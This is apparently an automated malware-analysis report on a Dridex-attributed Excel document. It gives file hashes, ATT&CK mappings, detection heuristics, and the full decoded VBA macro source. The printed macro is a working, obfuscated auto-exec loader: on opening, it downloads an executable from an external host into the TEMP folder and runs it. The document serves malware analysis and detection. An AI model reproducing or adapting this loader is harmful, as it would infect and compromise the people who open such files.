Dridex — Office (OLE) malware analysis

Static analysis result for SHA-256 189f436ca27dc657…

MALICIOUS

Office (OLE)

37.5 KB Created: 1996-10-08 23:32:33 Authoring application: Microsoft Excel First seen: 2015-03-15
MD5: 00d3b0f0c0d9c85024a32175eb2f7589 SHA-1: e7184de07c4aa8cd2c23ce9c33ef58200ca538f7 SHA-256: 189f436ca27dc657552eafc9b39f21b7dee873f4669c1ce9d7c11eb39fbec89d
356 Risk Score

Malware Insights

Dridex · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample is an Excel file containing obfuscated VBA macros that execute upon opening. The Workbook_Open macro utilizes the URLDownloadToFile API to download and execute a second-stage payload, a common technique for malware like Dridex. The ClamAV detection of Xls.Trojan.Dridex-5 further supports this family attribution.

Heuristics 9

  • ClamAV: Xls.Trojan.Dridex-5 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Dridex-5
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set ываААвыаыва = CreateObject(tIBlTVqSYlvQeRDfBAc(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set ываААвыаыва = CreateObject(tIBlTVqSYlvQeRDfBAc(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    & Chr$(96) & Chr$(120) & Chr$(99) & Chr$(101) & Chr$(62)), Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(96) & Chr$(77) & Chr$( _

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6631 bytes
SHA-256: 57d028020bc4d66f0d4f7c7f527a329a811ce0afa0b78bb981b55636ca8d43a8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
atqk_x482mp6v
End Sub

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "АавпавпАА"

Public Function tIBlTVqSYlvQeRDfBAc(VdkAbaqgjbz As String) As String
For HFncwnerBk = 1 To Len(VdkAbaqgjbz) Step 2
tIBlTVqSYlvQeRDfBAc = tIBlTVqSYlvQeRDfBAc & Mid(VdkAbaqgjbz, HFncwnerBk, 1)
Next
End Function


Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class4"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class5"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "ываывААва"
#If VBA7 Then
    Private Declare PtrSafe Function гшПНШываа Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
    ByVal ПСрпспсппОап As String, _
    ByVal ПСрпспсппОапf As String, _
    ByVal ПСрпспсппОапfd As Long, _
    ByVal ПСрпспсппОапfds As LongPtr) As LongPtr
#Else
    Private Declare Function гшПНШываа Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
    ByVal ПСрпспсппОап As String, _
    ByVal ПСрпспсппОапf As String, _
    ByVal ПСрпспсппОапfd As Long, _
    ByVal ПСрпспсппОапfds As Long) As Long
#End If
Sub atqk_x482mp6v()
рпорпАавпавп tIBlTVqSYlvQeRDfBAc(Chr$(104) & Chr$(43) & Chr$(116) & Chr$(83) & Chr$(116) & Chr$(38) & Chr$(112) & Chr$(47) & Chr$(58) & Chr$(73) & Chr$(47) & Chr$(93) & Chr$(47) & Chr$(134) & Chr$(48) & Chr$(60) & Chr$(51) & Chr$(35) & Chr$(52) & Chr$(109) & Chr$(48) & Chr$(61) & Chr$(52) & Chr$(104) & Chr$(101) & Chr$(102) & Chr$(98) & Chr$(56) & Chr$(46) & Chr$(120) & Chr$(110) & Chr$(54) & Chr$(101) & Chr$(126) & Chr$(116) & Chr$(134) & Chr$(115) & Chr$(84) & Chr$(111) & Chr$(35) & Chr$(108) & Chr$(56) & Chr$(104) & Chr$(45) & Chr$(111) & Chr$(80) & Chr$(115) & Chr$(74) & Chr$(116) & Chr$(118) & Chr$(46) & Chr$(60) & Chr$(99) & Chr$(107) & Chr$(111) & Chr$(92) & Chr$(109) & Chr$(84) & Chr$(47) & Chr$(107) & Chr$(106) & Chr$(40) & Chr$(115) & Chr$(68) & Chr$(47) & Chr$(109) & Chr$(98) & Chr$(86) & Chr$(105) & Chr$(104) & Chr$(110) & Chr$(49) & Chr$(46) & Chr$(39) & Chr$(101) _
& Chr$(96) & Chr$(120) & Chr$(99) & Chr$(101) & Chr$(62)), Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(96) & Chr$(77) & Chr$( _
109) & Chr$(80) & Chr$(123))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(81) & Chr$(102) & Chr$(106) & Chr$(74) & Chr$(105) & Chr$(67) & Chr$(36) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(48) & Chr$(102) & Chr$(132) & Chr$(103) & Chr$(80) & Chr$(68) & Chr$(109) & Chr$(54) & Chr$(95) & Chr$(55) & Chr$(65) & Chr$(53) & Chr$(130) & Chr$(101) & Chr$(134) & Chr$(68) & Chr$(74) & Chr$(84) & Chr$(129) & Chr$(85) & Chr$(37) & Chr$(46) & Chr$(64) & Chr$(101) & Chr$(57) & Chr$(120) & Chr$(124) & Chr$(101) & Chr$(50))


End Sub
Function рпорпАавпавп(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
плрпААавпп = гшПНШываа(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
Set ываААвыаыва = CreateObject(tIBlTVqSYlvQeRDfBAc(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))

ываААвыаыва.Open Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(51) & Chr$(77) & Chr$(71) & Chr$(80) & Chr$(83))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(75) & Chr$(102) & Chr$(98) & Chr$(74) & Chr$(130) & Chr$(67) & Chr$(59) & Chr$(104) & Chr$(73) & Chr$(106) & Chr$(76) & Chr$(102) & Chr$(94) & Chr$(103) & Chr$(40) & Chr$(68) & Chr$(130) & Chr$(54) & Chr$(87) & Chr$(55) & Chr$(90) & Chr$(53) & Chr$(53) & Chr$(101) & Chr$(65) & Chr$(68) & Chr$(102) & Chr$(84) & Chr$(118) & Chr$(85) & Chr$(97) & Chr$(46) & Chr$(58) & Chr$(101) & Chr$(49) & Chr$(120) & Chr$(50) & Chr$(101) & Chr$(47))
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.